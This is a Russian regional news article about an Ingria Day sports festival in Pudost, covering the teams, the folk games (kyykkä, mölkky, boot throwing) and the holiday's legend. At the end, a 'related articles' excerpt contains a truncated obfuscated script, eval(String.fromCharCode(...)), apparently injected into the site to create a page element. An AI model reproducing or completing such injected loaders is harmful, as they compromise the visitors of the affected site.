В Пудости отметили День Ингрии.

stadion

1 октября в Пудости на базе Пудостьского КДЦ состоялась Спартакиада по национальным видам спорта. Соревнования посвящены Дню Ингрии, отмечаемому 5 октября. В них приняли участие 8 национальных команд.

Среди участников предстоящего турнира — футбольные коллективы «Ингрия» (представляет ингерманландских финнов), «Аманат» (представляет проживающих в Петербурге башкир), «Зилант» (татары), «Калмыкия», «Бурятия», «Разам» (белорусы), «Горец» (народы Дагестана), «Тревис-Спорт». Соревнования открыли председатель общества ингерманландских финнов «Инкери-Сеура» Владимир Яковлев, и главный судья соревнований Вильё Остонен. Цель соревнований – популяризация финно-угорских народных видов спорта.

Соревнования прошли в четырёх видах: мини-футбол, метание сапога, карело-финские городки (кююккя), мёлкки (народная карельская игра). На Спартакиаду приехали футбольные команды, поэтому о других видах программы спортсмены в большинстве не имели понятия. Тем не менее по два добровольца от каждой команды должны были пробовать себя в метании сапога, кююккя и мёлкки. И результаты были на удивление неплохими! Но некоторые команды-участники решили не отвлекаться от футбола. Этим они себя наказали, так как очков-то за все виды спорта давалось равное количество.

Погода была переменчивой во время всего игрового дня. Метателям сапога помогал сильнейший ветер, и, хоть мирового рекорда побить не удалось, лучший результат весьма неплох – 53 метра. Короткий, но мощный заряд града не испугал футболистов.

Карело-финские городки – одна из трёх дисциплин, по которым соревнуются в рамках чемпионатов мира по городошному спорту. Отличие от русских в том, что бита увесистей и напоминает скалку с одной ручкой, а рюхи ставятся по две одна на другую строго в ряд.

Мёлкки – игра древняя, возрождённая одной из финских фирм 20 лет назад. Требуется сбивать рюшки (которые так и называются «mölkky», которые пронумерованы. Если сбил одну – начисляются столько очков, сколько на её номере, если несколько – столько очков, сколько рюшек сбито.

День Ингрии – неофициальный праздник, отмечаемый в день почитания святой Анны Новгородской, бывшей до замужества за Ярославом Мудрым шведской принцессой Ингигерд. По легенде, русский князь подарил ей наши земли в качестве свадебного подарка, откуда и произошло название «Ингерманландия» = «земля людей Ингигерд».

Евгений АНТОНЕНКО

Публикация из Интернет-газеты Ленингрдской области «ГАТЧИНКА.РФ». http://gatchinka.ru/

Возможно, Вам также будут интересны статьи:

Передача о Калевале. Телеканал «Россия-1»... Ссылка на передачу. Передача из цикла "Земля героев" на телеканале Россия-1 рассказывает о герое карело-финского эпоса Калевала - Вяйнямёйнене, хор...
Фильм про Праздник танцев и песен в Эстонии, 2012 ... Inkerinsuomalaisten laulu- ja tanhujuhlat - так называется праздник песен и танцев ингерманландских финнов, который ежегодно проходит в одной из облас...
Лекция Владимира Кокко «Ветви финского племен... eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, ...